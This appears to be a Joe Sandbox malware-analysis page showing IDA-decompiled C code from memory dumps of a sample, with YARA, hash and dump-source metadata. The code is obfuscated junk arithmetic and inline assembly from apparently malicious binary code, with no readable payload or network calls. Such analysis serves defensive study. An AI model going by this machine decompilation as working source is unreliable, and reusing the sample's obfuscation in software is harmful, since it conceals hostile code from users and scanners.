                            																								asm("ror dword [0xf4b8683e], 0x4f");
                            																								asm("rol dword [0x1fd41a17], 0xe4");
                            																								asm("adc ebp, [0x4b5a13d8]");
                            																								_t52 = _t52 + 0x00000001 |  *0x949f5ac9;
                            																								asm("adc ah, [0xa8f58914]");
                            																								 *0x84b938d8 =  *0x84b938d8 ^ _t88;
                            																							} while ( *0x84b938d8 == 0);
                            																							asm("rcl dword [0xc3b7a474], 0xd1");
                            																							 *0xc137a826 =  *0xc137a826 - _t83;
                            																							asm("adc dl, 0x30");
                            																							asm("sbb ebx, [0x3547a339]");
                            																							asm("adc esp, 0x98a36087");
                            																						} while ( *0xc137a826 < 0);
                            																						asm("adc [0xadfaa672], ebp");
                            																						asm("sbb ebp, [0xca37ff21]");
                            																						_t83 = 0xb2b0438c;
                            																						 *0xe57b1aa8 = _t61;
                            																						_push( *0xce2d1089);
                            																						asm("sbb dl, [0xa590613c]");
                            																						asm("sbb esi, [0xd25595d5]");
                            																						_push( *0x7b0b06ed);
                            																						_t52 = _t52 -  *0xd85fd9c7 | 0x000000c6;
                            																					} while (_t52 >= 0);
                            																					_t88 =  *0xe31cdf7d * 0x2d7a;
                            																					_t69 = _t69 +  *0x750e82 - 1;
                            																				} while (_t69 < 0);
                            																				_t61 = _t61 -  *0x48825112;
                            																			} while (_t93 -  *0x5971fed6 < 0);
                            																			 *0x7ac4b8f6 =  *0x7ac4b8f6 >> 0x6d;
                            																			asm("scasb");
                            																			asm("rcl dword [0x5b7310a3], 0x46");
                            																			 *0xc6db26c9 =  *0xc6db26c9 >> 0xb1;
                            																			 *0x5f863184 =  *0x5f863184 - _t69;
                            																			 *0xcf69feee =  *0xcf69feee | 0xb2b0438c;
                            																		} while ( *0xcf69feee >= 0);
                            																		_t36 =  *0x23cd2c7d * 0x976e;
                            																		 *0xf11954d7 =  *0xf11954d7 & _t69;
                            																		_t95 =  *0x8f922f60 * 0x74b9;
                            																		_t5 = _t52;
                            																		_t52 =  *0xe9b4f367;
                            																		 *0xe9b4f367 = _t5;
                            																	} while (_t95 >= 0);
                            																	asm("sbb [0x28f7c71], ecx");
                            																	 *0xbb5876b1 =  *0xbb5876b1 >> 3;
                            																	asm("sbb ebp, 0xaae5569b");
                            																	_t96 = _t95 ^ 0xc61f848c;
                            																	_t61 = _t61 + 0xb0;
                            																	_pop(_t52);
                            																	 *0xb52d5ad0 =  *0xb52d5ad0 - _t69;
                            																	_t37 = _t36 |  *0xc91f48f7;
                            																	asm("adc edi, [0xd5b77333]");
                            																	asm("adc ebp, [0x4ee9bfd]");
                            																	 *0x6bf6ce68 =  *0x6bf6ce68 | _t37;
                            																} while ( *0x6bf6ce68 < 0);
                            																_t88 =  *0x911f3e7c * 0xf811;
                            																asm("adc [0xcda9c99], edx");
                            																 *0xd58598c0 = _t61;
                            																asm("adc dh, 0x1a");
                            																_t69 = _t69 + 0xffffffffe7db8bb7;
                            																 *0xdf613201 = _t96;
                            																 *0x33643d92 =  *0x33643d92 - ( *0xc39d4f6b * 0x0000358d |  *0x443cf333);
                            																asm("sbb [0x1dfa5420], cl");
                            																 *0x64bdd7ed =  *0x64bdd7ed << 0x1c;
                            															} while ( *0x64bdd7ed >= 0);
                            															 *0xd361b479 =  *0xd361b479 >> 0xbe;
                            															_t61 = _t61 |  *0xc540ee96;
                            															_t52 = _t52 -  *0x7e27d5cd;
                            															asm("rcl byte [0x7f59a808], 0x9e");
                            															 *0x1102e93c =  *0x1102e93c - _t69;
                            															asm("rcl dword [0xc7ae89ea], 0xf3");
                            														} while ( *0x1102e93c <= 0);
                            														 *0xb7c81e76 =  *0xb7c81e76 + _t96;
                            														asm("rcl dword [0x7679d96e], 0x4f");
                            														 *0x61087a8a =  *0x61087a8a << 0x7f;
                            														 *0x52215eda =  *0x52215eda | _t52;
                            														 *0x221f5618 =  *0x221f5618 - _t69;
                            														asm("rcl dword [0x9a0af395], 0xbf");
                            														_t61 = _t88;
                            														asm("ror byte [0xa6adc0d2], 0xb2");
                            														_t69 = _t69 -  *0x8596d93;
                            														 *0xa9b87b17 =  *0xa9b87b17 >> 0x23;
                            														_t88 = _t88 & 0x33ef9b9e;
                            														_t83 = 0xffffffffb2b0438e;
                            														 *0xf041d427 =  *0xf041d427 ^ _t88;
                            														_push( *0xb57018a1);
                            														asm("rcl dword [0xa4d24b87], 0x4c");
                            														asm("rcr dword [0xdb6b1cd8], 0x4b");
                            														 *0x35777ed1 =  *0x35777ed1 ^ _t37;
                            														asm("adc [0x98e3dc16], edx");
                            														asm("rol dword [0xda94df07], 0x9e");
                            														_t52 =  *0xbf8e54c2 ^ 0x0000001c;
                            														 *0x8b3b6d91 =  *0x8b3b6d91 >> 0xe8;
                            													} while ((_t37 |  *0xe2a0629d) != 0);
                            													_t52 = _t52 -  *0x33ebfb7a;
                            													_t10 = _t69 +  *0x2f12440f;
                            													_t69 =  *0x8c96c18;
                            													 *0x8c96c18 = _t10;
                            													_t63 =  *0x1073d09 ^  *0x501c25b8;
                            													_t88 = 0x3844526f;
                            													asm("cmpsw");
                            													asm("sbb al, [0x6962bcd2]");
                            													 *0xdb80ed6e =  *0xdb80ed6e + _t63;
                            													asm("sbb esi, [0xf225e0db]");
                            													_pop(_t41);
                            													asm("sbb al, [0x77a5bbf2]");
                            													_pop(_t101);
                            													_t61 = _t63 +  *0x23384916 + 1;
                            													asm("lodsb");
                            												} while (_t61 > 0);
                            												_t88 =  *0xc533157f * 0x3b43;
                            											} while ((_t101 ^  *0xed25e0d9) != 0);
                            											asm("rol dword [0x6761b87b], 0x1e");
                            											asm("scasb");
                            											_t88 =  &_v3;
                            											_t61 = _t61 ^ 0xb39593ce;
                            											_t69 = _t69 | 0x1c7e11c8;
                            											_t43 = _t41 &  *0x3eea7e9b |  *0x9ed205d5;
                            											_push(_t88);
                            											asm("sbb bh, 0xb7");
                            											asm("movsb");
                            											 *0x254963a3 =  *0x254963a3 - _t43;
                            											 *0xab61ba22 =  *0xab61ba22 | _t61;
                            											 *0xffe1a7de =  *0xffe1a7de >> 0x48;
                            											_t52 = 0xf1;
                            											 *0x6f0dd8e1 = _t69;
                            										} while (0xf1 != 0);
                            										 *0xef2cbe7a =  *0xef2cbe7a - _t88;
                            										_t69 = _t69 - 0xb938b717;
                            										_t61 = _t61 -  *0xce2587fe +  *0x6a71e225;
                            										_push(_t69);
                            									} while (_t61 != 0);
                            									_t61 = _t61 ^  *0x89e04b75;
                            									asm("adc ch, 0xe4");
                            									_t44 = _t43 ^  *0x73ec6fc4;
                            									 *0x75b00ec2 =  *0x75b00ec2 << 0x46;
                            								} while ( *0x75b00ec2 <= 0);
                            								 *0xcd0ced76 =  *0xcd0ced76 & 0xf1;
                            								_push( *0xd4d120df);
                            								_t73 = _t69 ^  *0x8ce1f464;
                            								_t45 = _t44 - 1;
                            								asm("ror byte [0x878fe3], 0xe1");
                            								asm("scasd");
                            								 *0x1639dabc =  *0x68efdc60 * 0xadd6;
                            								asm("rcr byte [0x54942e24], 0x3c");
                            								 *0x1f0b9e8d =  *0x1f0b9e8d | _t73;
                            								_t52 = (0xf1 |  *0xb80842fb) + 0xe0;
                            								 *0x37c44cf8 =  *0x37c44cf8 - _t45;
                            								_t69 = _t73 +  *0x32973d1d;
                            								 *0xb763939e =  *0xb763939e >> 0x42;
                            							} while (_t69 >= 0);
                            							 *0xeb5c9437 =  *0xeb5c9437 + _t45;
                            							asm("rcl dword [0x38d4a393], 0x77");
                            							asm("sbb eax, 0xfce6b2d1");
                            							_t88 = 0x5a73a3f4;
                            							asm("rcl dword [0xeae9a79f], 0xd6");
                            							_t83 = 0xffffffffb2b0438e -  *0x13b0c162;
                            							_t69 = _t69 + 1;
                            						} while (( *0x9bb3e420 & _t61) >= 0);
                            						 *0xa528d679 =  *0xa528d679 >> 0xe4;
                            						 *0x61cf7d7 =  *0x61cf7d7 ^ _t52;
                            						asm("a16 dec ebp");
                            						_t88 =  &_v3;
                            						asm("sbb [0xca6f60ce], ebx");
                            						_t61 =  *0x42672f63 +  *0x5f7886ec - 0xf675de09;
                            						asm("scasd");
                            						_t52 = _t52;
                            					} while (_t52 + 0xe5 < 0);
                            					asm("sbb esp, 0x750d85ea");
                            					L1();
                            					 *0x18fc16e8 =  *0x18fc16e8 >> 0x44;
                            					asm("rcl byte [0x9fbc8e12], 0xc6");
                            					_t88 =  &_v5 ^ 0xb443ffdc;
                            					asm("adc eax, [0xd78df39b]");
                            					 *0x42f6ec12 =  *0x42f6ec12 - 0xffffffffffffff04;
                            					asm("sbb ecx, [0x1e330fcb]");
                            				} while (0x88 >= 0x2a);
                            				 *0x99185171 = _t88;
                            				 *0x8243ecfd =  *0x8243ecfd + 0xffffffffffffff04;
                            				asm("adc ecx, 0xdb79ca66");
                            				asm("adc [0xdf8cf9e5], bh");
                            				 *0x3d7fffd8 =  *0x3d7fffd8 - _t61 -  *0xf0afc732;
                            				asm("ror dword [0x7a23fb97], 0xa2");
                            				_pop( *0x7e4569ed);
                            				asm("adc [0x5580d91d], ebx");
                            				_push(0xe9add88c);
                            				_t91 =  &_v3;
                            				 *0x9b16143b = _t91;
                            				 *0x8f4a19b4 =  *0x8f4a19b4 >> 0x24;
                            				asm("sbb [0x9cc75697], esi");
                            				asm("ror byte [0x487d6aa2], 0xc8");
                            				asm("adc ch, [0xd63a601a]");
                            				 *0xe1b52868 = _t91;
                            				asm("sbb [0xdc0e3df8], esi");
                            				return 0xffffffffffffff0f;
                            			}























                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: oRD8
                            • API String ID: 0-2435772424
                            • Opcode ID: 3ccc48051c45ae8eb0bdd5c25ed5c6fb4127e76a861f9f2451771d79ee3da230
                            • Instruction ID: 1ab930881535956a8d0fbbe35cdab4942be05adaf2d7944d93492490a90f67da
                            • Opcode Fuzzy Hash: 3ccc48051c45ae8eb0bdd5c25ed5c6fb4127e76a861f9f2451771d79ee3da230
                            • Instruction Fuzzy Hash: 69D1A832818785CFEB16EF39D99A7453FB0F756734B08028EC8A283592DB742566CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 42%
                            			E0039EB62(void* __ebx, void* __ecx, void* __edx, void* __esi) {
                            				signed int _t36;
                            				signed int _t37;
                            				signed int _t41;
                            				signed int _t43;
                            				signed int _t44;
                            				void* _t45;
                            				signed char _t51;
                            				signed char _t55;
                            				signed char _t57;
                            				void* _t60;
                            				signed int _t61;
                            				signed char _t69;
                            				void* _t71;
                            				signed char _t73;
                            				signed char _t74;
                            				void* _t75;
                            				intOrPtr _t76;
                            				signed int _t80;
                            				signed int _t82;
                            				signed char _t83;
                            				signed int _t85;
                            				signed int _t86;
                            				void* _t89;
                            				signed char _t93;
                            				void* _t95;
                            				void* _t96;
                            				signed int _t98;
                            				signed int _t99;
                            				signed int _t100;
                            				signed int _t101;
                            				void* _t102;
                            				void* _t103;
                            				void* _t117;
                            				signed int _t120;
                            				signed int _t122;
                            				signed int _t125;
                            				void* _t126;
                            				intOrPtr _t132;
                            				signed int _t133;
                            				signed int _t135;
                            				signed int _t136;
                            				signed int _t141;
                            
                            				L0:
                            				do {
                            					do {
                            						do {
                            							do {
                            								do {
                            									do {
                            										do {
                            											do {
                            												do {
                            													do {
                            														do {
                            															do {
                            																do {
                            																	do {
                            																		do {
                            																			do {
                            																				do {
                            																					do {
                            																						do {
                            																							do {
                            																								L0:
                            																								asm("rcr dword [0x1926d0cc], 0x2");
                            																								asm("adc al, [0x24680be1]");
                            																								_t73 = __ecx -  *0xc8617cf6;
                            																								_push( *0x90b3d699);
                            																								if(_t73 >= 0) {
                            																									continue;
                            																								}
                            																								L1:
                            																								_t133 =  *0x2d9e7c7d * 0x9001;
                            																								 *0x663386e4 =  *0x663386e4 - __edx;
                            																								_t74 = _t73 & 0x000000a0;
                            																								asm("ror dword [0xf4b8683e], 0x4f");
                            																								asm("rol dword [0x1fd41a17], 0xe4");
                            																								asm("adc ebp, [0x4b5a13d8]");
                            																								_t55 = __ebx + 0x00000001 |  *0x949f5ac9;
                            																								asm("adc ah, [0xa8f58914]");
                            																								 *0x84b938d8 =  *0x84b938d8 ^ _t120;
                            																							} while ( *0x84b938d8 == 0);
                            																							L2:
                            																							asm("rcl dword [0xc3b7a474], 0xd1");
                            																							 *0xc137a826 =  *0xc137a826 - __esi;
                            																							asm("adc dl, 0x30");
                            																							asm("sbb ebx, [0x3547a339]");
                            																							asm("adc esp, 0x98a36087");
                            																						} while ( *0xc137a826 < 0);
                            																						L3:
                            																						asm("adc [0xadfaa672], ebp");
                            																						asm("sbb ebp, [0xca37ff21]");
                            																						 *0xe57b1aa8 = _t74;
                            																						_push( *0xce2d1089);
                            																						asm("sbb dl, [0xa590613c]");
                            																						asm("sbb esi, [0xd25595d5]");
                            																						_push( *0x7b0b06ed);
                            																						_t57 = _t55 -  *0xd85fd9c7 | 0x000000c6;
                            																					} while (_t57 >= 0);
                            																					L4:
                            																					_t93 = __edx +  *0x750e82 - 1;
                            																				} while (_t93 < 0);
                            																				L5:
                            																				_t75 = _t74 -  *0x48825112;
                            																			} while (_t133 -  *0x5971fed6 < 0);
                            																			L6:
                            																			 *0x7ac4b8f6 =  *0x7ac4b8f6 >> 0x6d;
                            																			asm("scasb");
                            																			asm("rcl dword [0x5b7310a3], 0x46");
                            																			 *0xc6db26c9 =  *0xc6db26c9 >> 0xb1;
                            																			 *0x5f863184 =  *0x5f863184 - _t93;
                            																			 *0xcf69feee =  *0xcf69feee | 0xb2b0438c;
                            																		} while ( *0xcf69feee >= 0);
                            																		L7:
                            																		_t36 =  *0x23cd2c7d * 0x976e;
                            																		 *0xf11954d7 =  *0xf11954d7 & _t93;
                            																		_t135 =  *0x8f922f60 * 0x74b9;
                            																		 *0xe9b4f367 = _t57;
                            																	} while (_t135 >= 0);
                            																	L8:
                            																	asm("sbb [0x28f7c71], ecx");
                            																	 *0xbb5876b1 =  *0xbb5876b1 >> 3;
                            																	asm("sbb ebp, 0xaae5569b");
                            																	_t136 = _t135 ^ 0xc61f848c;
                            																	_t76 = _t75 + 0xb0;
                            																	_pop(_t60);
                            																	 *0xb52d5ad0 =  *0xb52d5ad0 - _t93;
                            																	_t37 = _t36 |  *0xc91f48f7;
                            																	asm("adc edi, [0xd5b77333]");
                            																	asm("adc ebp, [0x4ee9bfd]");
                            																	 *0x6bf6ce68 =  *0x6bf6ce68 | _t37;
                            																} while ( *0x6bf6ce68 < 0);
                            																L9:
                            																_t122 =  *0x911f3e7c * 0xf811;
                            																asm("adc [0xcda9c99], edx");
                            																 *0xd58598c0 = _t76;
                            																asm("adc dh, 0x1a");
                            																_t95 = _t93 + 0xffffffffe7db8bb7;
                            																 *0xdf613201 = _t136;
                            																 *0x33643d92 =  *0x33643d92 - ( *0xc39d4f6b * 0x0000358d |  *0x443cf333);
                            																asm("sbb [0x1dfa5420], cl");
                            																 *0x64bdd7ed =  *0x64bdd7ed << 0x1c;
                            															} while ( *0x64bdd7ed >= 0);
                            															L10:
                            															 *0xd361b479 =  *0xd361b479 >> 0xbe;
                            															_t61 = _t60 -  *0x7e27d5cd;
                            															asm("rcl byte [0x7f59a808], 0x9e");
                            															 *0x1102e93c =  *0x1102e93c - _t95;
                            															asm("rcl dword [0xc7ae89ea], 0xf3");
                            														} while ( *0x1102e93c <= 0);
                            														L11:
                            														 *0xb7c81e76 =  *0xb7c81e76 + _t136;
                            														_push(_t122);
                            														asm("rcl dword [0x7679d96e], 0x4f");
                            														 *0x61087a8a =  *0x61087a8a << 0x7f;
                            														 *0x52215eda =  *0x52215eda | _t61;
                            														 *0x221f5618 =  *0x221f5618 - _t95;
                            														asm("rcl dword [0x9a0af395], 0xbf");
                            														asm("ror byte [0xa6adc0d2], 0xb2");
                            														_t96 = _t95 -  *0x8596d93;
                            														 *0xa9b87b17 =  *0xa9b87b17 >> 0x23;
                            														 *0xf041d427 =  *0xf041d427 ^ _t122 & 0x33ef9b9e;
                            														_push( *0xb57018a1);
                            														asm("rcl dword [0xa4d24b87], 0x4c");
                            														asm("rcr dword [0xdb6b1cd8], 0x4b");
                            														 *0x35777ed1 =  *0x35777ed1 ^ _t37;
                            														asm("adc [0x98e3dc16], edx");
                            														asm("rol dword [0xda94df07], 0x9e");
                            														 *0x8b3b6d91 =  *0x8b3b6d91 >> 0xe8;
                            													} while ((_t37 |  *0xe2a0629d) != 0);
                            													L12:
                            													_t98 =  *0x8c96c18;
                            													 *0x8c96c18 = _t96 +  *0x2f12440f;
                            													_t80 =  *0x1073d09 ^  *0x501c25b8;
                            													asm("cmpsw");
                            													asm("sbb al, [0x6962bcd2]");
                            													 *0xdb80ed6e =  *0xdb80ed6e + _t80;
                            													asm("sbb esi, [0xf225e0db]");
                            													_pop(_t41);
                            													asm("sbb al, [0x77a5bbf2]");
                            													_pop(_t141);
                            													_t82 = _t80 +  *0x23384916 + 1;
                            													asm("lodsb");
                            												} while (_t82 > 0);
                            												L13:
                            												_t125 =  *0xc533157f * 0x3b43;
                            											} while ((_t141 ^  *0xed25e0d9) != 0);
                            											L14:
                            											asm("rol dword [0x6761b87b], 0x1e");
                            											asm("scasb");
                            											_t126 = _t125 + 1;
                            											_t83 = _t82 ^ 0xb39593ce;
                            											_t99 = _t98 | 0x1c7e11c8;
                            											_t43 = _t41 &  *0x3eea7e9b |  *0x9ed205d5;
                            											_push(_t126);
                            											asm("sbb bh, 0xb7");
                            											asm("movsb");
                            											 *0x254963a3 =  *0x254963a3 - _t43;
                            											 *0xab61ba22 =  *0xab61ba22 | _t83;
                            											 *0xffe1a7de =  *0xffe1a7de >> 0x48;
                            											 *0x6f0dd8e1 = _t99;
                            										} while (0xf1 != 0);
                            										L15:
                            										 *0xef2cbe7a =  *0xef2cbe7a - _t126;
                            										_t100 = _t99 - 0xb938b717;
                            										_t85 = _t83 -  *0xce2587fe +  *0x6a71e225;
                            										_push(_t100);
                            									} while (_t85 != 0);
                            									L16:
                            									_t86 = _t85 ^  *0x89e04b75;
                            									asm("adc ch, 0xe4");
                            									_t44 = _t43 ^  *0x73ec6fc4;
                            									 *0x75b00ec2 =  *0x75b00ec2 << 0x46;
                            								} while ( *0x75b00ec2 <= 0);
                            								L17:
                            								 *0xcd0ced76 =  *0xcd0ced76 & 0xf1;
                            								_push( *0xd4d120df);
                            								_t101 = _t100 ^  *0x8ce1f464;
                            								_t45 = _t44 - 1;
                            								asm("ror byte [0x878fe3], 0xe1");
                            								asm("scasd");
                            								 *0x1639dabc =  *0x68efdc60 * 0xadd6;
                            								asm("rcr byte [0x54942e24], 0x3c");
                            								 *0x1f0b9e8d =  *0x1f0b9e8d | _t101;
                            								_t69 = (0xf1 |  *0xb80842fb) + 0xe0;
                            								 *0x37c44cf8 =  *0x37c44cf8 - _t45;
                            								_t102 = _t101 +  *0x32973d1d;
                            								 *0xb763939e =  *0xb763939e >> 0x42;
                            							} while (_t102 >= 0);
                            							L18:
                            							 *0xeb5c9437 =  *0xeb5c9437 + _t45;
                            							asm("rcl dword [0x38d4a393], 0x77");
                            							asm("sbb eax, 0xfce6b2d1");
                            							asm("rcl dword [0xeae9a79f], 0xd6");
                            							_t117 = 0xffffffffb2b0438e -  *0x13b0c162;
                            							_t103 = _t102 + 1;
                            						} while (( *0x9bb3e420 & _t86) >= 0);
                            						 *0xa528d679 =  *0xa528d679 >> 0xe4;
                            						 *0x61cf7d7 =  *0x61cf7d7 ^ _t69;
                            						L20:
                            						asm("a16 dec ebp");
                            						asm("sbb [0xca6f60ce], ebx");
                            						_t89 =  *0x42672f63 +  *0x5f7886ec - 0xf675de09;
                            						asm("scasd");
                            						_t71 = _t69;
                            					} while (_t69 + 0xe5 < 0);
                            					L21:
                            					asm("sbb esp, 0x750d85ea");
                            					_t51 = E0039EB62(_t71, _t89, _t103, _t117);
                            					 *0x18fc16e8 =  *0x18fc16e8 >> 0x44;
                            					asm("rcl byte [0x9fbc8e12], 0xc6");
                            					asm("adc eax, [0xd78df39b]");
                            					 *0x42f6ec12 =  *0x42f6ec12 - _t51;
                            					asm("sbb ecx, [0x1e330fcb]");
                            				} while (0x88 >= 0x2a);
                            				 *0x99185171 = 0xffffffffee305c28;
                            				 *0x8243ecfd =  *0x8243ecfd + _t51;
                            				asm("adc ecx, 0xdb79ca66");
                            				asm("adc [0xdf8cf9e5], bh");
                            				 *0x3d7fffd8 =  *0x3d7fffd8 - _t89 -  *0xf0afc732;
                            				asm("ror dword [0x7a23fb97], 0xa2");
                            				_pop( *0x7e4569ed);
                            				asm("adc [0x5580d91d], ebx");
                            				_push(0xe9add88c);
                            				_t132 =  *0x99185171 + 1;
                            				 *0x9b16143b = _t132;
                            				 *0x8f4a19b4 =  *0x8f4a19b4 >> 0x24;
                            				asm("sbb [0x9cc75697], esi");
                            				asm("ror byte [0x487d6aa2], 0xc8");
                            				asm("adc ch, [0xd63a601a]");
                            				 *0xe1b52868 = _t132;
                            				asm("sbb [0xdc0e3df8], esi");
                            				return _t51 | 0x0000000b;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: oRD8
                            • API String ID: 0-2435772424
                            • Opcode ID: 5a1d3b9bd107fadb5021e877d8ba55cf7bd0f515c7627a6551b2b3abc224c85e
                            • Instruction ID: 96e01310dffc6771a91ad01072d838437d3c5ad1cff7fe45edb2e68ca8e50879
                            • Opcode Fuzzy Hash: 5a1d3b9bd107fadb5021e877d8ba55cf7bd0f515c7627a6551b2b3abc224c85e
                            • Instruction Fuzzy Hash: 75C18532828785CFEB16EF39D99A7453FB0F356734B08024EC4A287992DB752526CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 56%
                            			E0039DD5C(signed int __eax, intOrPtr __ebx, void* __ecx, void* __edx, signed int __edi, void* __esi) {
                            				signed int _t33;
                            				void* _t38;
                            
                            				_t38 = __edx;
                            				_t33 = __eax ^ 0xd6c21ae9;
                            				asm("adc cl, 0xd0");
                            				asm("movsw");
                            				asm("rol dword [0xf1bbe9d6], 0x39");
                            				 *0x3023eab3 =  *0x3023eab3 << 0x65;
                            				 *0xeeda2629 =  *0xeeda2629 | __edi;
                            				asm("adc esp, 0xf28cb21b");
                            				 *0x4f100fbe = __edi;
                            				 *0x1b742908 = __ebx;
                            				 *0xefcf2495 =  *0xefcf2495 +  *0x1b742908;
                            				asm("adc eax, [0x6639a9eb]");
                            				if( *0xefcf2495 > 0) {
                            					 *0xdb8aeb76 = __ecx;
                            					 *0xa42e3ff9 =  *0xa42e3ff9 | __ch;
                            					if( *0xa42e3ff9 != 0) {
                            						asm("ror dword [0xd9903a74], 0xf8");
                            						__eax = __eax -  *0x8590fbeb;
                            						asm("rcr byte [0x2bf308e2], 0x2d");
                            						_push(0xed2e66fa);
                            						_t2 = __edx;
                            						__edx =  *0x510e24d4;
                            						 *0x510e24d4 = _t2;
                            						 *0xf726d20d =  *0xf726d20d << 0x8e;
                            						 *0xb55c5b93 =  *0xb55c5b93 << 0x57;
                            						__bh = __bh ^  *0xc68e26e7;
                            						asm("adc ebp, [0xa79f1181]");
                            						__edx =  *0xa2d48c2f;
                            						 *0xa2d48c2f =  *0x510e24d4;
                            						asm("sbb esi, [0x5f4c1321]");
                            						asm("adc [0x5e10e533], eax");
                            						asm("sbb dh, [0x920bd6e4]");
                            						__eax = __eax ^  *0x3553013b;
                            						 *0x2b6b732 =  *0x2b6b732 << 0xc9;
                            						 *0xeeb6158f =  *0xeeb6158f << 0x70;
                            						if( *0xeeb6158f >= 0) {
                            							__edx = __edx + 0xbcd3bc72;
                            							__edi = __edi + 0xc45e4595;
                            							_pop(__ebp);
                            							 *0x54f934c9 =  *0x54f934c9 | __bl;
                            							asm("adc esi, 0x61136199");
                            							__edx = __edx ^ 0xa3a94a83;
                            							__cl = __cl ^  *0xd39d9c32;
                            							__esp = __esp |  *0x16bd8819;
                            							asm("movsw");
                            							 *0x19c60ae3 =  *0x19c60ae3 ^ __cl;
                            							asm("lodsd");
                            							asm("adc bl, 0xb5");
                            							__edi =  *0x27914069 * 0xb1a8;
                            							asm("sbb esi, [0x6c17d79b]");
                            							asm("rol byte [0xc66f7db4], 0x19");
                            							_push(__eax);
                            							 *0x79b8688b =  *0x79b8688b & __edx;
                            							if( *0x79b8688b < 0) {
                            								__esi =  *0xbcd11f7d * 0x8f02;
                            								__esp = __esp | 0x2887110f;
                            								__edi = __edi & 0x37e17666;
                            								asm("ror dword [0x1516dfa1], 0xdb");
                            								_push(__ecx);
                            								asm("stosd");
                            								asm("sbb ebp, 0xbc1667c2");
                            								if(__edi == 0) {
                            									asm("sbb edi, 0x1e8d4b7b");
                            									asm("stosb");
                            									__eax =  *0x1ca1f4dc;
                            									 *0x8051683d = __edx;
                            									__ch = __ch | 0x000000e5;
                            									if(__ch < 0) {
                            										 *0xbb87f79 =  *0xbb87f79 ^ __ecx;
                            										 *0x27f5ffeb =  *0x27f5ffeb << 0x76;
                            										__edi = __edi - 0xdb2eed2f;
                            										 *0xf8f03c6 =  *0xf8f03c6 | __ch;
                            										_pop( *0xd779c61b);
                            										__ch =  *0x4593c5e6;
                            										__edx =  *0xe7e09160 * 0xbf96;
                            										__ebx = __ebx ^  *0x3cc80c67;
                            										 *0x4d238100 =  *0x4d238100 << 0xcf;
                            										L1();
                            										__ebx = __ebx | 0x4d9960e8;
                            										 *0xf577050d =  *0xf577050d << 0xd3;
                            										 *0xa9ce1f63 =  *0xa9ce1f63 << 0x4b;
                            										_pop(__edx);
                            										__ebx = __ebx & 0x89a2632e;
                            										 *0x1f590ba9 =  *0x1f590ba9 >> 0x43;
                            										 *0x8fc435f2 =  *0x8fc435f2 & __ah;
                            										if( *0x8fc435f2 >= 0) {
                            											asm("adc eax, 0x8950278");
                            											 *0xfffa138f =  *0xfffa138f << 0xb3;
                            											 *0x733ddf2f =  *0x733ddf2f << 0x99;
                            											__eax = __eax +  *0xec3d0cc0;
                            											_push(__ebp);
                            											__eax = __eax - 1;
                            											__edi = __edi ^ 0x12ad1167;
                            											__ebx = __ebx +  *0xb85ca168;
                            											asm("rol dword [0x2473932e], 0xc0");
                            											 *0x1dd46626 =  *0x1dd46626 ^ __esp;
                            											asm("sbb [0x6f3ac66f], ebx");
                            											asm("sbb [0x5500eda], ebx");
                            											asm("sbb [0xb0e730d9], ebp");
                            											 *0xe7d0a2b4 =  *0xe7d0a2b4 >> 0xc9;
                            											 *0x81c68e26 =  *0x81c68e26 ^ __esp;
                            											__ebp = __ebp | 0x9f27a194;
                            											_push(__eax);
                            											__esi = __esi + 1;
                            											if(__esi == 0) {
                            												 *0x226a6c7b =  *0x226a6c7b & __eax;
                            												__ebx = __ebx + 1;
                            												if(__ebx < 0) {
                            													_t12 = __ecx;
                            													__ecx =  *0xc8761a71;
                            													 *0xc8761a71 = _t12;
                            													__edx = __edx + 0xb881871b;
                            													__edx = __edx -  *0x1ed610ec;
                            													 *0xa4bfc7f2 =  *0xa4bfc7f2 ^ __bl;
                            													__esi = __esi |  *0x8b4b72fb;
                            													 *0xa9d2c53c =  *0xa9d2c53c - 0x12;
                            													__cl = __cl -  *0xba3487e7;
                            													asm("rcr byte [0x4410810], 0x4e");
                            													if(__cl >= 0) {
                            														asm("sbb cl, [0x40ca633a]");
                            														if((__ebx & 0x898cfc70) < 0) {
                            															asm("rcl dword [0xc5a4f973], 0xee");
                            															_pop(__ecx);
                            															__edi = __edi |  *0xe7770f16;
                            															__edi = __edi ^ 0x0938d23f;
                            															 *0xe9e06e15 =  *0xe9e06e15 + __edx;
                            															 *0xfad3a8f4 =  *0xfad3a8f4 >> 0xce;
                            															_pop(__ebx);
                            															 *0x75a93d19 = __ebp;
                            															if( *0xfad3a8f4 == 0) {
                            																__ebp =  *0x8414b87a;
                            																__edi = __edi | 0x2f39ec68;
                            																 *0x89414fba =  *0x89414fba - __ebx;
                            																_push( *0x9d663bc);
                            																_t15 = __eax;
                            																__eax =  *0xe7a9d2c7;
                            																 *0xe7a9d2c7 = _t15;
                            																asm("adc ebx, 0x8ba3487");
                            																 *0xccb1e422 =  *0xccb1e422 << 0x51;
                            																__ebp =  *0x8414b87a | 0x24db0116;
                            																 *0x52db7420 =  *0x52db7420 << 0x20;
                            																 *0x1e2465a8 =  *0x1e2465a8 - __cl;
                            																if(__ecx != 0) {
                            																	__esi = __esi -  *0xecd22574;
                            																	_t16 = __ebx;
                            																	__ebx =  *0x8d3ffac4;
                            																	 *0x8d3ffac4 = _t16;
                            																	_push(0xd44a8a8e);
                            																	__esi =  *0x4a2cf413;
                            																	__ebx =  *0x8d3ffac4 ^ 0xb3b96e67;
                            																	asm("movsw");
